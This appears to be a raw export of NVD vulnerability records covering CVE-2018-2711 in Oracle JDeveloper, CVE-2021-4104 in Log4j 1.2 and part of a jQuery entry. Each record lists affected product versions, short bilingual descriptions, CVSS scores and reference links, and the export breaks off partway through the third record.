Vendor | Product | Version | |
---|---|---|---|
oracle | jdeveloper | 11.1.1.2.4 | |
oracle | jdeveloper | 11.1.1.7.0 | |
oracle | jdeveloper | 11.1.1.7.1 | |
oracle | jdeveloper | 11.1.1.9.0 | |
oracle | jdeveloper | 12.1.3.0.0 |
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:jdeveloper:11.1.1.2.4:*:*:*:*:*:*:*", matchCriteriaId: "610772EA-97C5-4062-83B7-7663517E76CE", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:11.1.1.7.0:*:*:*:*:*:*:*", matchCriteriaId: "07EF593B-376C-4367-B9FB-1F429062576C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:11.1.1.7.1:*:*:*:*:*:*:*", matchCriteriaId: "9E9124B7-0F2C-4018-B5B5-5BA659333933", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:*", matchCriteriaId: "A7506589-9B3B-49BA-B826-774BFDCC45B8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "042C243F-EDFE-4A04-AB0B-26E73CC34837", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "Vulnerability in the Oracle JDeveloper component of Oracle Fusion Middleware (subcomponent: Security Framework). Supported versions that are affected are 11.1.1.2.4, 11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle JDeveloper. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle JDeveloper, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle JDeveloper accessible data as well as unauthorized update, insert or delete access to some of Oracle JDeveloper accessible data. CVSS 3.0 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).", }, { lang: "es", value: "Vulnerabilidad en el componente Oracle JDeveloper de Oracle Fusion Middleware (subcomponente: Security Framework). 
Las versiones soportadas que se han visto afectadas son la 11.1.1.2.4, 11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0 y la 12.1.3.0.0. Una vulnerabilidad fácilmente explotable permite que un atacante sin autenticar con acceso a red por HTTP comprometa la seguridad de Oracle JDeveloper. Para que los ataques tengan éxito, se necesita la participación de otra persona diferente del atacante y, aunque la vulnerabilidad está presente en Oracle JDeveloper, los ataques podrían afectar seriamente a productos adicionales. Los ataques exitosos a esta vulnerabilidad pueden resultar en un acceso no autorizado a datos confidenciales o un acceso completo a todos los datos accesibles de Oracle JDeveloper; así como en el acceso no autorizado de actualización, inserción o eliminación de algunos de los datos accesibles de Oracle JDeveloper. CVSS 3.0 Base Score 8.2 (impactos de confidencialidad e integridad). Vector CVSS: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).", }, ], id: "CVE-2018-2711", lastModified: "2024-11-21T04:04:18.257", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "MEDIUM", cvssData: { accessComplexity: "MEDIUM", accessVector: "NETWORK", authentication: "NONE", availabilityImpact: "NONE", baseScore: 5.8, confidentialityImpact: "PARTIAL", integrityImpact: "PARTIAL", vectorString: "AV:N/AC:M/Au:N/C:P/I:P/A:N", version: "2.0", }, exploitabilityScore: 8.6, impactScore: 4.9, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: true, }, ], cvssMetricV30: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 8.2, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N", version: "3.0", }, exploitabilityScore: 2.8, impactScore: 4.7, source: "nvd@nist.gov", type: 
"Primary", }, ], }, published: "2018-01-18T02:29:24.477", references: [ { source: "secalert_us@oracle.com", tags: [ "Patch", "Vendor Advisory", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html", }, { source: "secalert_us@oracle.com", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://www.securityfocus.com/bid/102539", }, { source: "secalert_us@oracle.com", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://www.securitytracker.com/id/1040207", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Vendor Advisory", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://www.securityfocus.com/bid/102539", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://www.securitytracker.com/id/1040207", }, ], sourceIdentifier: "secalert_us@oracle.com", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "NVD-CWE-noinfo", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:apache:log4j:1.2:*:*:*:*:*:*:*", matchCriteriaId: "2954BDA9-F03D-44AC-A9EA-3E89036EEFA8", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", matchCriteriaId: "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:redhat:codeready_studio:12.0:*:*:*:*:*:*:*", matchCriteriaId: "1BAF877F-B8D5-4313-AC5C-26BB82006B30", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:integration_camel_k:-:*:*:*:*:*:*:*", matchCriteriaId: "B87C8AD3-8878-4546-86C2-BF411876648C", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:integration_camel_quarkus:-:*:*:*:*:*:*:*", matchCriteriaId: "F039C746-2001-4EE5-835F-49607A94F12B", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:jboss_a-mq:6.0.0:*:*:*:*:*:*:*", matchCriteriaId: "33C4404A-CFB7-4B47-9487-F998825C31CA", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:jboss_a-mq:7:*:*:*:*:*:*:*", matchCriteriaId: "A58966CB-36AF-4E64-AB39-BE3A0753E155", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:jboss_a-mq_streaming:-:*:*:*:*:*:*:*", matchCriteriaId: "8C7257E5-B4A7-4299-8FE1-A94121E47528", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:jboss_data_grid:7.0.0:*:*:*:*:*:*:*", matchCriteriaId: "CD354E32-A8B0-484C-B4C6-9FBCD3430D2D", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:jboss_data_virtualization:6.0.0:*:*:*:*:*:*:*", matchCriteriaId: "5CDDAFDB-E67A-4795-B2C4-C2D31734ABC8", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:jboss_enterprise_application_platform:6.0.0:*:*:*:*:*:*:*", matchCriteriaId: "B142ACCC-F7A9-4A3B-BE60-0D6691D5058D", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.0:*:*:*:*:*:*:*", matchCriteriaId: "88BF3B2C-B121-483A-AEF2-8082F6DA5310", vulnerable: true, }, { criteria: 
"cpe:2.3:a:redhat:jboss_fuse:6.0.0:*:*:*:*:*:*:*", matchCriteriaId: "A305F012-544E-4245-9D69-1C8CD37748B1", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:jboss_fuse:7.0.0:*:*:*:*:*:*:*", matchCriteriaId: "B40CCE4F-EA2C-453D-BB76-6388767E5C6D", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:jboss_fuse_service_works:6.0:*:*:*:*:*:*:*", matchCriteriaId: "3B78438D-1321-4BF4-AEB1-DAF60D589530", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:jboss_operations_network:3.0:*:*:*:*:*:*:*", matchCriteriaId: "C077D692-150C-4AE9-8C0B-7A3EA5EB1100", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:jboss_web_server:3.0:*:*:*:*:*:*:*", matchCriteriaId: "54EB07A0-FB38-4F17-9C8D-DB629967F07B", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:openshift_application_runtimes:-:*:*:*:*:*:*:*", matchCriteriaId: "A33441B3-B301-426C-A976-08CE5FE72EFB", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:openshift_container_platform:4.6:*:*:*:*:*:*:*", matchCriteriaId: "6B62E762-2878-455A-93C9-A5DB430D7BB5", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:openshift_container_platform:4.7:*:*:*:*:*:*:*", matchCriteriaId: "14CF53D2-B585-4EA5-8F18-21BC9ECBB4B6", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:openshift_container_platform:4.8:*:*:*:*:*:*:*", matchCriteriaId: "91B493F0-5542-49F7-AAAE-E6CA6E468D7B", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:process_automation:7.0:*:*:*:*:*:*:*", matchCriteriaId: "20A6B40D-F991-4712-8E30-5FE008505CB7", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:single_sign-on:7.0:*:*:*:*:*:*:*", matchCriteriaId: "9EFEC7CA-8DDA-48A6-A7B6-1F1D14792890", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:software_collections:-:*:*:*:*:*:*:*", matchCriteriaId: "749804DA-4B27-492A-9ABA-6BB562A6B3AC", vulnerable: true, }, { criteria: "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", matchCriteriaId: "2F6AB192-9D7D-4A9A-8995-E53A9DE9EAFC", vulnerable: true, }, { criteria: "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", 
matchCriteriaId: "142AD0DD-4CF3-4D74-9442-459CE3347E3A", vulnerable: true, }, { criteria: "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", matchCriteriaId: "F4CFF558-3C47-480D-A2F0-BABF26042943", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:advanced_supply_chain_planning:12.1:*:*:*:*:*:*:*", matchCriteriaId: "A62E2A25-1AD7-4B4B-9D1B-F0DEA4550557", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:advanced_supply_chain_planning:12.2:*:*:*:*:*:*:*", matchCriteriaId: "0331158C-BBE0-42DB-8180-EB1FCD290567", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_intelligence:5.9.0.0.0:*:*:*:enterprise:*:*:*", matchCriteriaId: "B602F9E8-1580-436C-A26D-6E6F8121A583", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_intelligence:12.2.1.3.0:*:*:*:enterprise:*:*:*", matchCriteriaId: "77C3DD16-1D81-40E1-B312-50FBD275507C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_intelligence:12.2.1.4.0:*:*:*:enterprise:*:*:*", matchCriteriaId: "81DAC8C0-D342-44B5-9432-6B88D389584F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_process_management_suite:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "E869C417-C0E6-4FC3-B406-45598A1D1906", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_process_management_suite:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "DFEFE2C0-7B98-44F9-B3AD-D6EC607E90DA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_eagle_ftp_table_base_retrieval:4.5:*:*:*:*:*:*:*", matchCriteriaId: "C68536CA-C7E2-4228-A6B8-F0DB6A9D29EC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_messaging_server:8.1:*:*:*:*:*:*:*", matchCriteriaId: "E1214FDF-357A-4BB9-BADE-50FB2BD16D10", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_network_integrity:7.3.6:*:*:*:*:*:*:*", matchCriteriaId: "B21E6EEF-2AB7-4E96-B092-1F49D11B4175", vulnerable: true, }, { criteria: 
"cpe:2.3:a:oracle:communications_offline_mediation_controller:*:*:*:*:*:*:*:*", matchCriteriaId: "28CDCE04-B074-4D7A-B6E4-48193458C9A0", versionEndExcluding: "12.0.0.4.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_offline_mediation_controller:12.0.0.5.0:*:*:*:*:*:*:*", matchCriteriaId: "5933FEA2-B79E-4EE7-B821-54D676B45734", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_unified_inventory_management:7.3.4:*:*:*:*:*:*:*", matchCriteriaId: "0D299528-8EF0-49AF-9BDE-4B6C6B1DA36C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_unified_inventory_management:7.3.5:*:*:*:*:*:*:*", matchCriteriaId: "17A91FD9-9F77-42D3-A4D9-48BC7568ADE1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_unified_inventory_management:7.4.1:*:*:*:*:*:*:*", matchCriteriaId: "A7637F8B-15F1-42E2-BE18-E1FF7C66587D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_unified_inventory_management:7.4.2:*:*:*:*:*:*:*", matchCriteriaId: "E43D793A-7756-4D58-A8ED-72DC4EC9CEA7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:e-business_suite_cloud_manager_and_cloud_backup_module:2.2.1.1.1:*:*:*:*:*:*:*", matchCriteriaId: "6ED0EE39-C080-4E75-AE0F-3859B57EF851", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.4.0.0:*:*:*:*:*:*:*", matchCriteriaId: "D26F3E23-F1A9-45E7-9E5F-0C0A24EE3783", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.5.0.0:*:*:*:*:*:*:*", matchCriteriaId: "6E8758C8-87D3-450A-878B-86CE8C9FC140", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_revenue_management_and_billing_analytics:2.7.0.0:*:*:*:*:*:*:*", matchCriteriaId: "054B56E0-F11B-4939-B7E1-E722C67A041A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_revenue_management_and_billing_analytics:2.7.0.1:*:*:*:*:*:*:*", matchCriteriaId: "250A493C-E052-4978-ABBE-786DC8038448", vulnerable: true, }, { criteria: 
"cpe:2.3:a:oracle:financial_services_revenue_management_and_billing_analytics:2.8.0.0:*:*:*:*:*:*:*", matchCriteriaId: "2E2B771B-230A-4811-94D7-065C2722E428", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:fusion_middleware_common_libraries_and_tools:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "F17531CB-DE8A-4ACD-93A0-6A5A8481D51B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:goldengate:-:*:*:*:*:*:*:*", matchCriteriaId: "507E7AEE-C2FC-4EED-B0F7-5E41642C0BF7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_data_repository:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "66C673C4-A825-46C0-816B-103E1C058D03", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hyperion_data_relationship_management:*:*:*:*:*:*:*:*", matchCriteriaId: "E8E7FBA9-0FFF-4C86-B151-28C17A142E0B", versionEndExcluding: "11.2.8.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hyperion_infrastructure_technology:*:*:*:*:*:*:*:*", matchCriteriaId: "55BBCD48-BCC6-4E19-A4CE-970E524B9FF4", versionEndExcluding: "11.2.8.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:identity_management_suite:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "1489DDA7-EDBE-404C-B48D-F0B52B741708", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:identity_management_suite:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "535BC19C-21A1-48E3-8CC0-B276BA5D494E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "228DA523-4D6D-48C5-BDB0-DB1A60F23F8B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:mysql_enterprise_monitor:*:*:*:*:*:*:*:*", matchCriteriaId: "B0EBAC6D-D0CE-42A1-AEA0-2D50C8035747", versionEndIncluding: "8.0.29", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_allocation:14.1.3.2:*:*:*:*:*:*:*", matchCriteriaId: "51E83F05-B691-4450-BCA9-32209AEC4F6A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_allocation:15.0.3.1:*:*:*:*:*:*:*", matchCriteriaId: "288235F9-2F9E-469A-BE14-9089D0782875", vulnerable: true, }, { 
criteria: "cpe:2.3:a:oracle:retail_allocation:16.0.3:*:*:*:*:*:*:*", matchCriteriaId: "6672F9C1-DA04-47F1-B699-C171511ACE38", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_allocation:19.0.1:*:*:*:*:*:*:*", matchCriteriaId: "11E57939-A543-44F7-942A-88690E39EABA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_extract_transform_and_load:13.2.5:*:*:*:*:*:*:*", matchCriteriaId: "30501D23-5044-477A-8DC3-7610126AEFD7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:stream_analytics:-:*:*:*:*:*:*:*", matchCriteriaId: "0B45A731-11D1-433B-B202-9C8D67C609F9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:timesten_grid:-:*:*:*:*:*:*:*", matchCriteriaId: "900D9DBF-8071-4CE5-A67A-9E0C00D04B87", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:tuxedo:12.2.2.0.0:*:*:*:*:*:*:*", matchCriteriaId: "EB7D0A30-3986-49AB-B7F3-DAE0024504BA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:utilities_testing_accelerator:6.0.0.1.1:*:*:*:*:*:*:*", matchCriteriaId: "A3ED272C-A545-4F8C-86C0-2736B3F2DCAF", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:utilities_testing_accelerator:6.0.0.2.2:*:*:*:*:*:*:*", matchCriteriaId: "C5B4C338-11E1-4235-9D5A-960B2711AC39", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:utilities_testing_accelerator:6.0.0.3.1:*:*:*:*:*:*:*", matchCriteriaId: "8C93F84E-9680-44EF-8656-D27440B51698", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "F14A818F-AA16-4438-A3E4-E64C9287AC66", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "4A5BB153-68E0-4DDA-87D1-0D9AB7F0A418", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:*", matchCriteriaId: "04BCDC24-4A21-473C-8733-0D9CFB38A752", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted 
data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.", }, { lang: "es", value: "JMSAppender en Log4j versión 1.2 es vulnerable a una deserialización de datos no confiables cuando el atacante presenta acceso de escritura a la configuración de Log4j. El atacante puede proporcionar configuraciones TopicBindingName y TopicConnectionFactoryBindingName haciendo que JMSAppender realice peticiones JNDI que resulten en la ejecución de código remota de forma similar a CVE-2021-44228. Tenga en cuenta que este problema sólo afecta a Log4j versión 1.2 cuando es configurado específicamente para usar JMSAppender, que no es el predeterminado. Apache Log4j versión 1.2 llegó al final de su vida útil en agosto de 2015. 
Los usuarios deberían actualizar a Log4j 2 ya que aborda otros numerosos problemas de las versiones anteriores", }, ], id: "CVE-2021-4104", lastModified: "2024-11-21T06:36:54.560", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "MEDIUM", cvssData: { accessComplexity: "MEDIUM", accessVector: "NETWORK", authentication: "SINGLE", availabilityImpact: "PARTIAL", baseScore: 6, confidentialityImpact: "PARTIAL", integrityImpact: "PARTIAL", vectorString: "AV:N/AC:M/Au:S/C:P/I:P/A:P", version: "2.0", }, exploitabilityScore: 6.8, impactScore: 6.4, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], cvssMetricV31: [ { cvssData: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "LOW", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", version: "3.1", }, exploitabilityScore: 1.6, impactScore: 5.9, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2021-12-14T12:15:12.200", references: [ { source: "security@apache.org", url: "http://www.openwall.com/lists/oss-security/2022/01/18/3", }, { source: "security@apache.org", url: "https://access.redhat.com/security/cve/CVE-2021-4104", }, { source: "security@apache.org", url: "https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126", }, { source: "security@apache.org", url: "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0033", }, { source: "security@apache.org", url: "https://security.gentoo.org/glsa/202209-02", }, { source: "security@apache.org", url: "https://security.gentoo.org/glsa/202310-16", }, { source: "security@apache.org", url: "https://security.gentoo.org/glsa/202312-02", }, { source: "security@apache.org", url: "https://security.gentoo.org/glsa/202312-04", }, { 
source: "security@apache.org", url: "https://security.netapp.com/advisory/ntap-20211223-0007/", }, { source: "security@apache.org", url: "https://www.cve.org/CVERecord?id=CVE-2021-44228", }, { source: "security@apache.org", url: "https://www.kb.cert.org/vuls/id/930724", }, { source: "security@apache.org", url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { source: "security@apache.org", url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { source: "security@apache.org", url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "http://www.openwall.com/lists/oss-security/2022/01/18/3", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://access.redhat.com/security/cve/CVE-2021-4104", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0033", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://security.gentoo.org/glsa/202209-02", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://security.gentoo.org/glsa/202310-16", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://security.gentoo.org/glsa/202312-02", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://security.gentoo.org/glsa/202312-04", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://security.netapp.com/advisory/ntap-20211223-0007/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://www.cve.org/CVERecord?id=CVE-2021-44228", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://www.kb.cert.org/vuls/id/930724", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: 
"https://www.oracle.com/security-alerts/cpujan2022.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], sourceIdentifier: "security@apache.org", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-502", }, ], source: "security@apache.org", type: "Secondary", }, { description: [ { lang: "en", value: "CWE-502", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:jquery:jquery:*:*:*:*:*:*:*:*", matchCriteriaId: "D2D193C7-2259-492F-8B85-E74C57A7426A", versionEndExcluding: "3.4.0", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", matchCriteriaId: "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", vulnerable: true, }, { criteria: "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", matchCriteriaId: "DEECE5FC-CACF-4496-A3E7-164736409252", vulnerable: true, }, { criteria: "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", matchCriteriaId: "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*", matchCriteriaId: "FC5AB839-4DAC-45E7-9D0B-B528F6D12043", versionEndExcluding: "7.66", versionStartIncluding: "7.0", vulnerable: true, }, { criteria: "cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*", matchCriteriaId: "9106BF81-B898-4EB0-B63C-9919D3B22260", versionEndExcluding: "8.5.15", versionStartIncluding: "8.5.0", vulnerable: true, }, { criteria: "cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*", matchCriteriaId: "9B37281E-9B44-42A5-AE0A-17CE6770995C", versionEndExcluding: "8.6.15", versionStartIncluding: "8.6.0", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:backdropcms:backdrop:*:*:*:*:*:*:*:*", matchCriteriaId: "E75C32CE-3FA9-4DC2-A22A-4A841D4911EB", versionEndExcluding: "1.11.9", versionStartIncluding: "1.11.0", vulnerable: true, }, { criteria: "cpe:2.3:a:backdropcms:backdrop:*:*:*:*:*:*:*:*", matchCriteriaId: "F6F204D6-2C8A-4517-8E3C-328ED0D9D3E4", versionEndExcluding: "1.12.6", versionStartIncluding: "1.12.0", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:fedoraproject:fedora:28:*:*:*:*:*:*:*", matchCriteriaId: 
"DC1BD7B7-6D88-42B8-878E-F1318CA5FCAF", vulnerable: true, }, { criteria: "cpe:2.3:o:fedoraproject:fedora:29:*:*:*:*:*:*:*", matchCriteriaId: "D100F7CE-FC64-4CC6-852A-6136D72DA419", vulnerable: true, }, { criteria: "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*", matchCriteriaId: "97A4B8DF-58DA-4AB6-A1F9-331B36409BA3", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:opensuse:backports_sle:15.0:sp1:*:*:*:*:*:*", matchCriteriaId: "40513095-7E6E-46B3-B604-C926F1BA3568", vulnerable: true, }, { criteria: "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", matchCriteriaId: "B620311B-34A3-48A6-82DF-6F078D7A4493", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:netapp:oncommand_system_manager:*:*:*:*:*:*:*:*", matchCriteriaId: "B9273745-6408-4CD3-94E8-9385D4F5FE69", versionEndIncluding: "3.1.3", versionStartIncluding: "3.0", vulnerable: true, }, { criteria: "cpe:2.3:a:netapp:snapcenter:-:*:*:*:*:*:*:*", matchCriteriaId: "BDFB1169-41A0-4A86-8E4F-FDA9730B1E94", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:redhat:cloudforms:4.7:*:*:*:*:*:*:*", matchCriteriaId: "04AC556D-D511-4C4C-B9FB-A089BB2FEFD5", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:virtualization_manager:4.3:*:*:*:*:*:*:*", matchCriteriaId: "9FA1A18F-D997-4121-A01B-FD9B3BF266CF", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.1:*:*:*:*:*:*:*", matchCriteriaId: "230E2167-9107-4994-8328-295575E17DF6", vulnerable: true, }, { criteria: 